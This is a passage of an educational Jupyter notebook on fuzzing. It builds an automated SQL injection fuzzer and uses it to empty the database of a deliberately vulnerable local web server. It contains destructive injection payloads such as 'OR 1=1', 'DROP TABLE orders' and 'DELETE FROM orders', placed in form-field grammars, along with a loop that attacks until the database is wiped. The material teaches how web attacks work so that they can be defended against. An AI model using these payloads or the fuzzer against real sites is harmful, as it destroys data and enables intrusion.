       " '<other>': ['0', '1', '2', '3', '4', '5', 'a', 'b', 'c', 'd', 'e', '-', '_'],\n",
       " '<text>': ['<string>', '<sql-injection-attack>'],\n",
       " '<number>': ['<digits>', '<sql-injection-attack>'],\n",
       " '<digits>': ['<digit>', '<digits><digit>'],\n",
       " '<digit>': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],\n",
       " '<checkbox>': ['<_checkbox>', '<sql-injection-attack>'],\n",
       " '<_checkbox>': ['on', 'off'],\n",
       " '<email>': ['<_email>', '<sql-injection-attack>'],\n",
       " '<_email>': ['<string>%40<string>'],\n",
       " '<hexdigit-1>': ['3', '4', '5', '6', '7'],\n",
       " '<submit>': [''],\n",
       " '<sql-injection-attack>': [\"<string>'+<sql-values>)%3b+<sql-payload>%3b+<sql-comment>\",\n",
       "  \"<string>'+<sql-comment>\",\n",
       "  \"'+OR+1%3d1<sql-comment>'\",\n",
       "  '<number>+OR+1%3d1'],\n",
       " '<sql-values>': ['', \"<sql-values>,+'<string>'\"],\n",
       " '<sql-payload>': ['DROP+TABLE+orders'],\n",
       " '<sql-comment>': ['--', '#'],\n",
       " '<action>': ['/order'],\n",
       " '<item>': ['item=<item-value>'],\n",
       " '<item-value>': ['tshirt', 'drill', 'lockset'],\n",
       " '<name>': ['name=<text>'],\n",
       " '<email-1>': ['email=<email>'],\n",
       " '<city>': ['city=<text>'],\n",
       " '<zip>': ['zip=<number>'],\n",
       " '<terms>': ['terms=<checkbox>'],\n",
       " '<submit-1>': ['submit=<submit>'],\n",
       " '<query>': ['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']}"
      ]
     },
     "execution_count": 155,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar = html_miner.mine_grammar()\n",
    "grammar"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 156,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.831542Z",
     "iopub.status.busy": "2025-01-16T10:12:26.831467Z",
     "iopub.status.idle": "2025-01-16T10:12:26.833445Z",
     "shell.execute_reply": "2025-01-16T10:12:26.833216Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['<string>', '<sql-injection-attack>']"
      ]
     },
     "execution_count": 156,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar[\"<text>\"]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We see that several fields now are tested for vulnerabilities:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 157,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.835054Z",
     "iopub.status.busy": "2025-01-16T10:12:26.834946Z",
     "iopub.status.idle": "2025-01-16T10:12:26.839540Z",
     "shell.execute_reply": "2025-01-16T10:12:26.839336Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "\"/order?item=lockset&name=4+OR+1%3d1&email=%66%40%3ba&city=%7a&zip=99&terms=1'+#&submit=\""
      ]
     },
     "execution_count": 157,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "sql_fuzzer = GrammarFuzzer(grammar)\n",
    "sql_fuzzer.fuzz()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 158,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.840882Z",
     "iopub.status.busy": "2025-01-16T10:12:26.840808Z",
     "iopub.status.idle": "2025-01-16T10:12:26.842563Z",
     "shell.execute_reply": "2025-01-16T10:12:26.842321Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 159,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.843884Z",
     "iopub.status.busy": "2025-01-16T10:12:26.843811Z",
     "iopub.status.idle": "2025-01-16T10:12:26.848552Z",
     "shell.execute_reply": "2025-01-16T10:12:26.848321Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] INSERT INTO orders VALUES ('tshirt', 'Jane Doe', 'doe@example.com', 'Seattle', '98104')\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "contents = webbrowser(urljoin(httpd_url,\n",
    "                              \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"))"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 160,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.849895Z",
     "iopub.status.busy": "2025-01-16T10:12:26.849799Z",
     "iopub.status.idle": "2025-01-16T10:12:26.851537Z",
     "shell.execute_reply": "2025-01-16T10:12:26.851331Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "def orders_db_is_empty():\n",
    "    \"\"\"Return True if the orders database is empty (= we have been successful)\"\"\"\n",
    "\n",
    "    try:\n",
    "        entries = db.execute(\"SELECT * FROM orders\").fetchall()\n",
    "    except sqlite3.OperationalError:\n",
    "        return True\n",
    "    return len(entries) == 0"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 161,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.852853Z",
     "iopub.status.busy": "2025-01-16T10:12:26.852766Z",
     "iopub.status.idle": "2025-01-16T10:12:26.854734Z",
     "shell.execute_reply": "2025-01-16T10:12:26.854524Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "False"
      ]
     },
     "execution_count": 161,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "orders_db_is_empty()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We create a `SQLInjectionFuzzer` that does it all automatically."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 162,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.856069Z",
     "iopub.status.busy": "2025-01-16T10:12:26.855970Z",
     "iopub.status.idle": "2025-01-16T10:12:26.858224Z",
     "shell.execute_reply": "2025-01-16T10:12:26.858014Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SQLInjectionFuzzer(WebFormFuzzer):\n",
    "    \"\"\"Simple demonstrator of a SQL Injection Fuzzer\"\"\"\n",
    "\n",
    "    def __init__(self, url: str, sql_payload : str =\"\", *,\n",
    "                 sql_injection_grammar_miner_class: Optional[type] = None,\n",
    "                 **kwargs):\n",
    "        \"\"\"Constructor.\n",
    "        `url` - the Web page (with a form) to retrieve\n",
    "        `sql_payload` - the SQL command to execute\n",
    "        `sql_injection_grammar_miner_class` - the miner to be used\n",
    "            (default: SQLInjectionGrammarMiner)\n",
    "        Other keyword arguments are passed to `WebFormFuzzer`.\n",
    "        \"\"\"\n",
    "        self.sql_payload = sql_payload\n",
    "\n",
    "        if sql_injection_grammar_miner_class is None:\n",
    "            sql_injection_grammar_miner_class = SQLInjectionGrammarMiner\n",
    "        self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class\n",
    "\n",
    "        super().__init__(url, **kwargs)\n",
    "\n",
    "    def get_grammar(self, html_text):\n",
    "        \"\"\"Obtain a grammar with SQL injection commands\"\"\"\n",
    "\n",
    "        grammar_miner = self.sql_injection_grammar_miner_class(\n",
    "            html_text, sql_payload=self.sql_payload)\n",
    "        return grammar_miner.mine_grammar()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 163,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.859611Z",
     "iopub.status.busy": "2025-01-16T10:12:26.859513Z",
     "iopub.status.idle": "2025-01-16T10:12:27.106698Z",
     "shell.execute_reply": "2025-01-16T10:12:27.106402Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\n",
    "web_runner = WebRunner(httpd_url)\n",
    "trials = 1\n",
    "\n",
    "while True:\n",
    "    sql_fuzzer.run(web_runner)\n",
    "    if orders_db_is_empty():\n",
    "        break\n",
    "    trials += 1"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 164,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.108444Z",
     "iopub.status.busy": "2025-01-16T10:12:27.108341Z",
     "iopub.status.idle": "2025-01-16T10:12:27.110505Z",
     "shell.execute_reply": "2025-01-16T10:12:27.110279Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "68"
      ]
     },
     "execution_count": 164,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "trials"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Our attack was successful! After less than a second of testing, our database is empty:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 165,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.111911Z",
     "iopub.status.busy": "2025-01-16T10:12:27.111812Z",
     "iopub.status.idle": "2025-01-16T10:12:27.113799Z",
     "shell.execute_reply": "2025-01-16T10:12:27.113591Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "True"
      ]
     },
     "execution_count": 165,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "orders_db_is_empty()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Again, note the level of possible automation: We can\n",
    "\n",
    "* Crawl the Web pages of a host for possible forms\n",
    "* Automatically identify form fields and possible values\n",
    "* Inject SQL (or HTML, or JavaScript) into any of these fields\n",
    "\n",
    "and all of this fully automatically, not needing anything but the URL of the site."
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The bad news is that with a tool set as the above, anyone can attack websites.  The even worse news is that such penetration tests take place every day, on every website.  The good news, though, is that after reading this chapter, you now get an idea of how Web servers are attacked every day – and what you as a Web server maintainer could and should do to prevent this."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Synopsis\n",
    "\n",
    "This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Fuzzing Web Forms\n",
    "\n",
    "`WebFormFuzzer` demonstrates how to interact with a Web form.  Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements.  Support is limited to GET forms and a subset of HTML form elements."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Here's the grammar extracted for our vulnerable Web server:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 166,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.115249Z",
     "iopub.status.busy": "2025-01-16T10:12:27.115155Z",
     "iopub.status.idle": "2025-01-16T10:12:27.118467Z",
     "shell.execute_reply": "2025-01-16T10:12:27.118254Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "web_form_fuzzer = WebFormFuzzer(httpd_url)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 167,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.119803Z",
     "iopub.status.busy": "2025-01-16T10:12:27.119720Z",
     "iopub.status.idle": "2025-01-16T10:12:27.121793Z",
     "shell.execute_reply": "2025-01-16T10:12:27.121558Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['<action>?<query>']"
      ]
     },
     "execution_count": 167,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_form_fuzzer.grammar['<start>']"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 168,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.123199Z",
     "iopub.status.busy": "2025-01-16T10:12:27.123121Z",
     "iopub.status.idle": "2025-01-16T10:12:27.125143Z",
     "shell.execute_reply": "2025-01-16T10:12:27.124911Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['/order']"
      ]
     },
     "execution_count": 168,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_form_fuzzer.grammar['<action>']"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 169,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.126489Z",
     "iopub.status.busy": "2025-01-16T10:12:27.126409Z",
     "iopub.status.idle": "2025-01-16T10:12:27.128458Z",
     "shell.execute_reply": "2025-01-16T10:12:27.128220Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']"
      ]
     },
     "execution_count": 169,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_form_fuzzer.grammar['<query>']"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 170,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.129867Z",
     "iopub.status.busy": "2025-01-16T10:12:27.129793Z",
     "iopub.status.idle": "2025-01-16T10:12:27.134730Z",
     "shell.execute_reply": "2025-01-16T10:12:27.134506Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='"
      ]
     },
     "execution_count": 170,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_form_fuzzer.fuzz()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### SQL Injection Attacks\n",
    "\n",
    "`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server.  Otherwise, it is used like `WebFormFuzzer`:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 171,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.136216Z",
     "iopub.status.busy": "2025-01-16T10:12:27.136145Z",
     "iopub.status.idle": "2025-01-16T10:12:27.141685Z",
     "shell.execute_reply": "2025-01-16T10:12:27.141421Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "\"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit=\""
      ]
     },
     "execution_count": 171,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\n",
    "sql_fuzzer.fuzz()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "As you can see, the path to be retrieved contains the payload encoded into one of the form field values."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 172,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.143186Z",
     "iopub.status.busy": "2025-01-16T10:12:27.143107Z",
     "iopub.status.idle": "2025-01-16T10:12:27.144792Z",
     "shell.execute_reply": "2025-01-16T10:12:27.144584Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "# ignore\n",
    "from ClassDiagram import display_class_hierarchy\n",
    "from Fuzzer import Fuzzer, Runner\n",
    "from Grammars import Grammar, Expansion\n",
    "from GrammarFuzzer import GrammarFuzzer, DerivationTree"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 173,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:27.146212Z",
     "iopub.status.busy": "2025-01-16T10:12:27.146140Z",
     "iopub.status.idle": "2025-01-16T10:12:28.094580Z",
     "shell.execute_reply": "2025-01-16T10:12:28.094232Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "image/svg+xml": [
       "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n",
       "<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\n",
       " \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n",
       "<!-- Generated by graphviz version 12.2.1 (20241206.2353)\n",
       " -->\n",
       "<!-- Pages: 1 -->\n",
       "<svg width=\"594pt\" height=\"451pt\"\n",
       " viewBox=\"0.00 0.00 593.88 450.50\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n",
       "<g id=\"graph0\" class=\"graph\" transform=\"scale(1 1) rotate(0) translate(4 446.5)\">\n",
       "<g id=\"a_graph0\"><a xlink:title=\"WebFormFuzzer class hierarchy\">\n",
       "<polygon fill=\"white\" stroke=\"none\" points=\"-4,4 -4,-446.5 589.88,-446.5 589.88,4 -4,4\"/>\n",
       "</a>\n",
       "</g>\n",
       "<!-- WebFormFuzzer -->\n",
       "<g id=\"node1\" class=\"node\">\n",
       "<title>WebFormFuzzer</title>\n",
       "<g id=\"a_node1\"><a xlink:href=\"#\" xlink:title=\"class WebFormFuzzer:&#10;A Fuzzer for Web forms\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"9,-121.75 9,-194 125.5,-194 125.5,-121.75 9,-121.75\"/>\n",
       "<text text-anchor=\"start\" x=\"17\" y=\"-177.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">WebFormFuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"9,-168 125.5,-168\"/>\n",
       "<g id=\"a_node1_0\"><a xlink:href=\"#\" xlink:title=\"WebFormFuzzer\">\n",
       "<g id=\"a_node1_1\"><a xlink:href=\"#\" xlink:title=\"__init__(self, url: str, *, grammar_miner_class: Optional[type] = None, **grammar_fuzzer_options):&#10;Constructor.&#10;`url` &#45; the URL of the Web form to fuzz.&#10;`grammar_miner_class` &#45; the class of the grammar miner&#10;to use (default: `HTMLGrammarMiner`)&#10;Other keyword arguments are passed to the `GrammarFuzzer` constructor\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-155.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node1_2\"><a xlink:href=\"#\" xlink:title=\"get_grammar(self, html_text: str):&#10;Obtain the grammar for the given HTML `html_text`.&#10;To be overloaded in subclasses.\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-142.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"10.00\">get_grammar()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node1_3\"><a xlink:href=\"#\" xlink:title=\"get_html(self, url: str):&#10;Retrieve the HTML text for the given URL `url`.&#10;To be overloaded in subclasses.\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-130\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"10.00\">get_html()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- GrammarFuzzer -->\n",
       "<g id=\"node2\" class=\"node\">\n",
       "<title>GrammarFuzzer</title>\n",
       "<g id=\"a_node2\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"class GrammarFuzzer:&#10;Produce strings from grammars efficiently, using derivation trees.\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"9.38,-247.75 9.38,-320 125.12,-320 125.12,-247.75 9.38,-247.75\"/>\n",
       "<text text-anchor=\"start\" x=\"17.38\" y=\"-303.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">GrammarFuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"9.38,-294 125.12,-294\"/>\n",
       "<g id=\"a_node2_4\"><a xlink:href=\"#\" xlink:title=\"GrammarFuzzer\">\n",
       "<g id=\"a_node2_5\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"__init__(self, grammar: Dict[str, List[Expansion]], start_symbol: str = &#39;&lt;start&gt;&#39;, min_nonterminals: int = 0, max_nonterminals: int = 10, disp: bool = False, log: Union[bool, int] = False) &#45;&gt; None:&#10;Produce strings from `grammar`, starting with `start_symbol`.&#10;If `min_nonterminals` or `max_nonterminals` is given, use them as limits&#10;for the number of nonterminals produced.&#10;If `disp` is set, display the intermediate derivation trees.&#10;If `log` is set, show intermediate steps as text on standard output.\">\n",
       "<text text-anchor=\"start\" x=\"34.25\" y=\"-281.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node2_6\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"fuzz(self) &#45;&gt; str:&#10;Produce a string from the grammar.\">\n",
       "<text text-anchor=\"start\" x=\"34.25\" y=\"-268.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">fuzz()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node2_7\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"fuzz_tree(self) &#45;&gt; DerivationTree:&#10;Produce a derivation tree from the grammar.\">\n",
       "<text text-anchor=\"start\" x=\"34.25\" y=\"-256\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">fuzz_tree()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- WebFormFuzzer&#45;&gt;GrammarFuzzer -->\n",
       "<g id=\"edge1\" class=\"edge\">\n",
       "<title>WebFormFuzzer&#45;&gt;GrammarFuzzer</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M67.25,-194.41C67.25,-207.38 67.25,-222.25 67.25,-236.06\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"63.75,-235.82 67.25,-245.82 70.75,-235.82 63.75,-235.82\"/>\n",
       "</g>\n",
       "<!-- Fuzzer -->\n",
       "<g id=\"node3\" class=\"node\">\n",
       "<title>Fuzzer</title>\n",
       "<g id=\"a_node3\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"class Fuzzer:&#10;Base class for fuzzers.\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"29.25,-357 29.25,-442 105.25,-442 105.25,-357 29.25,-357\"/>\n",
       "<text text-anchor=\"start\" x=\"46.62\" y=\"-425.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">Fuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"29.25,-416 105.25,-416\"/>\n",
       "<g id=\"a_node3_8\"><a xlink:href=\"#\" xlink:title=\"Fuzzer\">\n",
       "<g id=\"a_node3_9\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"__init__(self) &#45;&gt; None:&#10;Constructor\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-403.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node3_10\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"fuzz(self) &#45;&gt; str:&#10;Return fuzz input\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-390.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">fuzz()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node3_11\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"run(self, runner: Fuzzer.Runner = &lt;Fuzzer.Runner object at 0x11ac515e0&gt;) &#45;&gt; Tuple[subprocess.CompletedProcess, str]:&#10;Run `runner` with fuzz input\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-378\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">run()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node3_12\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"runs(self, runner: Fuzzer.Runner = &lt;Fuzzer.PrintRunner object at 0x11ac53ce0&gt;, trials: int = 10) &#45;&gt; List[Tuple[subprocess.CompletedProcess, str]]:&#10;Run `runner` with fuzz input, `trials` times\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-365.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">runs()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- GrammarFuzzer&#45;&gt;Fuzzer -->\n",
       "<g id=\"edge2\" class=\"edge\">\n",
       "<title>GrammarFuzzer&#45;&gt;Fuzzer</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M67.25,-320.2C67.25,-328.18 67.25,-336.81 67.25,-345.33\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"63.75,-345.3 67.25,-355.3 70.75,-345.3 63.75,-345.3\"/>\n",
       "</g>\n",
       "<!-- SQLInjectionFuzzer -->\n",
       "<g id=\"node4\" class=\"node\">\n",
       "<title>SQLInjectionFuzzer</title>\n",
       "<g id=\"a_node4\"><a xlink:href=\"#\" xlink:title=\"class SQLInjectionFuzzer:&#10;Simple demonstrator of a SQL Injection Fuzzer\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"0,-4.5 0,-64 134.5,-64 134.5,-4.5 0,-4.5\"/>\n",
       "<text text-anchor=\"start\" x=\"8\" y=\"-47.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">SQLInjectionFuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"0,-38 134.5,-38\"/>\n",
       "<g id=\"a_node4_13\"><a xlink:href=\"#\" xlink:title=\"SQLInjectionFuzzer\">\n",
